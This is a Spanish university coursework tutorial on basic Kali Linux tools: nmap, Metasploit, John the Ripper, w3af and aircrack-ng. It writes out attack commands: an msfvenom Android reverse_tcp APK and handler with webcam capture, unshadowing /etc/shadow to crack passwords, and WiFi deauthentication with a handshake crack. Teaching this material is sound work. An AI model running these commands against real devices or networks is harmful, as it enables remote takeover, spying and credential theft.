Uso de Herramientas Basicas de Kali- Linux PDF

Title Uso de Herramientas Basicas de Kali- Linux
Course Seguridad Informática
Institution Universidad Popular del Cesar
Pages 30
File Size 2.7 MB
File Type PDF
Total Downloads 1
Total Views 132

Summary

A día de hoy, el sistema operativo más completo de seguridad y penetración es Kali-Linux. Este sistema operativo fue el sucesor del famoso Backtrack 5 Ya visto en anteriores actividades realizadas y que de momento está teniendo bastante éxito pese a las alternativas existentes que existen en el mund...


Description

1USO DE HERRAMIENTAS BASICAS DE KALI-LINUX

ASIGNATURA: SEGURIDAD INFORMATICA

DOCENTE: NEHEMIAS SARABIA

UNIVERSIDAD POPULAR DEL CESAR. INGENIERÍA DE SISTEMAS. VALLEDUPAR - CESAR

CONTENIDO 1 2 3 4 5 6

INTRODUCCION...................................................................................................................3 NMAP, (escáner de puertos)....................................................................................................4 METASPLOIT (tomar control de equipos remotos)...............................................................8 JHON THE RIPPER..............................................................................................................15 W3AF....................................................................................................................................20 AIRCRACK – NG.................................................................................................................22

2

1

INTRODUCCION

A día de hoy, el sistema operativo más completo de seguridad y penetración es Kali-Linux. Este sistema operativo fue el sucesor del famoso Backtrack 5 Ya visto en anteriores actividades realizadas y que de momento está teniendo bastante éxito pese a las alternativas existentes que existen en el mundo de la seguridad informática. Este sistema operativo viene con una gran cantidad de herramientas de seguridad informática, penetración y hacking ético sin fines maliciosos y más con fines de enseñanza de estas herramientas en un laboraría con ambiente controlado. Sin embargo, también hay mucha gente que lo usa para “hacer el mal” y realizar delitos informáticos. A continuación se va a presentar 5 herramientas que nos trae esta distribución, las cuales permitirán comprobar la seguridad de tus sistemas operativos y tomar conciencia acerca de la seguridad informática.

3

2

NMAP, (escáner de puertos)

NMAP es una aplicación que nos permite ver los equipos activos de una red y sacar diferente información, especialmente los puertos abiertos que nos serán de gran interés para realizar ataques y saber que aplicaciones está ejecutando, es sin duda el escáner más usado por los hackers, en Seguridad Informática lo usamos mucho para comprobar que estén abiertos sólo los puertos realmente necesarios y tapar lo mejor posible los accesos externos indeseados. Debe ser instalado en nuestro equipo, existe la versión para Windows que podremos descargar sin problema, o ejecutar sudo apt-get install en nuestro Linux para instalarlo. Kali Linux dispone del NMAP ya instalado, así que no nos será necesario estar instalando nada. Recuerdo que en Linux las mayúsculas y las minúsculas no son lo mismo, así que cuidado con las opciones. 1. Lo primero que vamos a ver, es como ejecutar nmap en el sistema Kali-Linux el cual ya lo trae por instalado defecto, se hace de la siguiente forma.

Nmap se encontrara alojado en la pestaña de Aplicaciones  Recopilación de información  nmap

4

2. Vamos a realizar el escaneo con la página SCANNE.NMAP.ORG la cual brinda los permisos para hacer este tipo de ataques sin ningún tipo de problema legal

3. Ponemos esa misma dirección y ejecutamos el comando: nmap scanme.nmap.org y nos mostrara la lista de puertos de los cuales dispones esta página, el estado (open, close o filtered) y cuantos host están arriba (up)

5

4. Ahora lo hacemos con la opción –v y –sS, vemos que nos da la IP del servidor y los puertos abiertos con los servicios asociados.

5. Si al nmap le añadimos la opción –O (o mayúscula), nos mostrará el sistema operativo de la víctima. En este caso vemos que está montado en una máquina virtual Oracle Virtualbox

6

6. Con Nmap, puede detectar qué sistema operativo y la versión que está ejecutando en el host remoto. Para habilitar la detección de sistema operativo y versión, la exploración de la escritura y la Ruta de seguimiento, podemos usar la opción "-A" con NMAP. Se puede ver que nmap se acercó con la huella digital TCP / IP del sistema operativo que se ejecuta en máquinas remotas y es más específico sobre el puerto y los servicios que se ejecutan en los hosts remotos

7. Escanear un anfitrión para Detectar Firewall Con el comando nmap –sA que realizará una búsqueda en un host remoto para detectar si los filtros de paquetes o Firewall se utiliza 7

por el anfitrión también se puede escanear un anfitrión con nmap –PN para comprobar su protección por Firewall y Para escanear un host si está protegido por ningún software de filtrado de paquetes o cortafuegos.

3

METASPLOIT (tomar control de equipos remotos)

MetaSploit es una suite o conjunto de programas en realidad. Está diseñada para explotar las vulnerabilidades de los equipos y es sin duda el programa más usado por los mejores hackers del mundo. Dentro de MetaSploit, disponemos de multitud de herramientas y programas para ejecutar en las diferentes vulnerabilidades de cada equipo, a cada una de estas aplicaciones se le llama exploit. Para poner en práctica esta herramienta tomaremos un dispositivo android (de mi propiedad) en el cual se pondrá a prueba esta poderosa herramienta 1. Lo primero que se realizara es saber nuestra ip, con el comando ifconfig se muestra la configuraciones de las tarjeta y toda su información, copiamos nuestra ip.

8

2. Luego en otra ventana de comando escribimos el comando: msfvenom -p android/meterpreter/reverse_tcp LHOST="Tu noip o ip local" LPORT="PUERTO" R "SIMBOLO MAYOR QUE" "Ruta\aplicacion.apk" El cual nos permitirá crear esta “aplicación” que nos dará acceso al terminal android, ponemos a correr el comando con Enter y esperamos a que cree el archivo

9

El archivo se creara con el nombre de Seguridad_Informatica_FM.apk y se ha alojado en el escritorio por la ruta asignada. 3. Se abre la pestaña en la máquina virtual, y se habilita el dispositivo conectado para que Kali-Linux lo reconozca

10

4. Se copia el archivo alojado en el escritorio se pega en la raíz de nuestro dispositivo android

5. Ahora se ejecuta MetasPloit en el menú Kali-Linux el cual ya lo trae por instalado defecto, se hace de la siguiente forma .

MetasPloit se encontrara alojado en la pestaña de Aplicaciones  Herramientas de explotacion  MetasPloit

11

6. Luego de ejecutar el METASPLOIT usamos el comando use exploit/multi/handler

7. Una vez en esta ruta, se para a configurar el payload con los parametros de lhost y lport. Con el comando show options certificamos que todo este correctamente configurado

12

8. Y ahora con el comando exploit se pone en ejecución la “aplicación” que se ha creado anteriormente

9. Se va al dispositivo android donde se hizo la copia del archivo y se instala y ejecuta

13

10. Al ejecutar este archivo y lograrse la conexión ´hacia el dispositivo aparece la dirección meterpreter donde ejecutaremos todos los comandos de ataque al dispositivo

11. Con el comando help se despliega una lista de comandos con su descripcion que se pueden probar

14

12. Un breve ejemplo es el comando webcam_snap 1 que permite tomar una foto con la cámara del dispositivo

Nota: Existen múltiples comando muy poderos que tiene esta herramienta, desde la obtención de información del dispositivo, hasta inyección de archivos maliciosos que el sistema android no detecta, sim embargo el uso de esta grandiosa aplicación se debe realizar en un ambiente controlado con total ética de hacking sin llegar a perjudicar a terceros

15

4

JHON THE RIPPER

El John The Ripper es una aplicación para desencriptar contraseñas por fuerza bruta. Se basa en un diccionario de contraseñas que puede ser el que se incluye o descargarnos uno que nos guste y lanzarlo. Para encontrar la contraseña es necesario que esta se encuentre en el diccionario. Lógicamente no todas las claves del mundo se encuentran en todos los diccionarios, estos se suelen basar en las contraseñas más usadas por los usuarios. La fuerza bruta consiste en usar un usuario e intentar autentificar con diferentes claves. Todos los Linux por defecto disponen del usuario root como administrador, al igual que los Windows usan Administrador y Administrator dependiendo del idioma del sistema. Esto es un grave fallo de seguridad en los sistemas sobre los que se basan los hackers para atacar diferentes sistemas y tomar control de ellos. Para la prueba de la herramienta de Jhon The Ripper crearemos un usuario y una contraseña sencilla para que sea fácil de desencriptar y desmostar el funcionamiento de nuestra herramienta A continuación se mostrara un ejemplo básico de Jhon The Ripper descrito paso a paso 1. El primer paso es abrir una terminar, luego con el comando useradd se crea un nuevo usuario que este ejemplo será FrankUpc, también le asignaremos una contraseña a este nuevo usuario creado con el comando passwd FrankUpc que este caso será 123456

2. Ahora procedemos a salir con el comando cd archivos del sistema

16

..

y luego el comando ls para ver los

3. Ahora se dirigirá a /etc con el comando cd etc donde encontraremos dos archivos muy importantes que guardan la información de los usuarios sus contraseñas asignadas, se puede explorar con el comando ls

4. Al explorar el contenido de /etc con el comando ls se encuentra los archivos passwd y shadow quienes nos facilitaran el proceso por su contenido que vamos a explorar

17

5. Teniendo los archivos en pantalla se procede a observar su contenido para evidenciar que se encuentra el usuario que se acaba de crear, con el comando nano passwd y yendo hacia la parte final encontramos usuario FrankUpc con una (X) que hace como contraseña

6. Al explorar el otro archivo shadow con el comando nano shadow encontramos la contraseña del usuario cifrada para que sea difícil de reconocer o cifrar para un programa

18

7. Ahora se volverá un paso atrás en el sistemas con el comando cd para asi unificar estos dos archivos en uno solo mediante el comando unshadow /etc/passwd /etc/shadow > ataque.txt. para comprobar que se realizo con éxito el proceso se escribe ls y se podrá ver el archivo ataque.txt contendrá la unificación de estos dos archivos

8. Teniendo el archivo ataque.txt se procede a usar la herramienta John the ripper mediente el siguiente código john --format=sha512crypt ataque.txt, el cual usa la herramienta a un archivo de texto llamado ataque.txt que cuenta con un cifrado tipo sha512crypt, al correr este comando mostrara el nombre del usuario y su contraseña

19

Nota: El John the ripper cuenta con un diccionario donde estas alojadas las contraseñas que compara para ver si es la correcta, si esta contraseña no se encuentra en este diccionario no será posible que el programa arroje resultados exitosos como los descritos anteriormente

20

5

W3AF

W3af es una herramienta para auditorias web la cual nos permite hacer un escaneo con mayor precisión ya que cuenta con muchos módulos los cuales hacen un gran uso de dicha herramienta ,W3af cuenta con tipos de ejecución por terminal y gráfica, esta herramienta está instalada en el backtracl 5 r3 Características    

Es un framework de test de intrusión web Está desarrollado en Python Bajo licencia GPLv2 Tiene funcionalidad de scanner de vulnerabilidades.

para iniciar el programa seguiremos la siguiente ruta: application/ BackTrack/ Vulnerability Assessment/ Web Aplication / Web Vulnerability Scanner / w3af gui

21

Con lo cual se iniciara la interfaz de esta herramienta:

Una vez cargada la aplicación como vemos, nos dice que si deseamos poner la Url de la web la cual vamos y abajo en profiles se selecciona fast_scan para llevar a cabo un escaneo rápido, se escogen todas las opciones para que la buqueda de vulnerabilidades sea mas completa y por ultimo start

22

Al iniciar el escaneo de vulnerabilidades se mostrara esta pantalla de resgistro donde se muestra paso a paso el proceso que se lleva a cabo

En la pestaña de al lado se encuentra Results donde se muestra los resultado del escaneo, en este caso la página analizada no presenta ningún tipo de vulnerabilidad, en caso contrario nos mostrara las posible vulnerabilidades y ataques que se pueden realizar

23

6

AIRCRACK – NG

Aircrack- ng es un conjunto completo de herramientas para evaluar la seguridad de la red WiFi. Se enfoca en diferentes áreas de seguridad WiFi:    

Monitoreo: captura de paquetes y exportación de datos a archivos de texto para su posterior procesamiento por parte de herramientas de terceros. Ataque: ataques de repetición, desauthentication, puntos de acceso falsos y otros a través de la inyección de paquetes. Pruebas: Comprobación de tarjetas WiFi y capacidades del controlador (captura e inyección). Cracking: WEP y WPA PSK (WPA 1 y 2).

Todas las herramientas son de línea de comandos, lo que permite secuencias de comandos pesadas. Muchas GUI se han aprovechado de esta característica. Funciona principalmente Linux, pero también Windows, OS X, FreeBSD, OpenBSD, NetBSD, Solaris e incluso eComStation 2. Para llevar a cabo la prueba de la herramienta AIRCRACK – NG se usara una unidad con el sistema instalado para que de esta forma arranque Kali-Linux sin inconvenientes 1. Lo primero se debe hacer es abrir la herramienta que se encuentra en el menú de aplicaciones  ataques wifi  AIRCRACK – NG

24

2. Una vez abierta la ventana de comando escribimos el comando iwconfig para verificar que nuestra tarjeta de red funcione correctamente, luego con el comando airmon-ng start wlan0 se cambia a modo monitor nuestra tarjeta de red para llevar a cabo los respectivos escaneos, por ultimo con el comando kill mas el numero de PID terminamos los procesos que pueden interrumpir el proceso

3. Con el comando airodump-ng wlan0mon se hace un escáner de las redes cercanas

4. Seguidamente se escoge la red a la cual se le pondrá a prueba el ataque, esto lo hacemos con el comando airodum-ng –c (canal victima) - -bssid (bssid victima) wlan0mon en nuestro caso nos queda así airodum-ng –c 11 - -bssid E8:89:2C:24:62:60 wlan0mon 25

5.

Con la ejecución del comando anterior se hará un seguimiento individual a la red escogida para el ataque que nos mostrara el número de clientes conectados que esta tiene

26

6. Al verificar que la red tiene clientes conectados, le agregamos la siguiente parte al comando anterior y queda así airodum-ng – c 11 - - bssid E8:89:2C:24:62:60 wlan0mon –w tcp para lograr guardar toda información del tráfico entre el cliente y la red

7. Dejamos ejecutando el comando anterior y se procede abrir una nueva ventana de comando para realizar otras tareas

27

8. En esta nueva ventana de comando escribimos el comando aireplay-ng -0 -5 –a E8:89:2C:24:62:60 –h aa:aa:aa:aa:aa:aa wlan0mon el 5 representa el número de mensajes que se enviaran y luego se escribe la mac de la víctima más una Mac cualquiera que va a capturar la mac necesaria para realizar el ataque

9. Al enviar estos mensajes y recibir una respuesta, la ventana de comando anterior nos saldrá un mensaje con el handshake que contiene la mac que se necesita para hacer el ataque

28

10. Con el comando básico de linux ls para listar los archivos, verificamos que se encuentre el archivo tcp-01.cap el cual contiene la información de la red que se esta atacando

11. ahora si con el comando aircrack-ng –w /usr/share/wordlists/rockyou.txt tcp-01.cap aplicamos el diccionario que trae por defecto esta herramienta al archivo donde esta la información de la red

29

12. Por ultimo dejamos que la herramienta haga el proceso el cual puede ser demorado a que intenta comparar las contraseñas que tiene almacenada en su diccionario hasta dar con la correcta

30...


Similar Free PDFs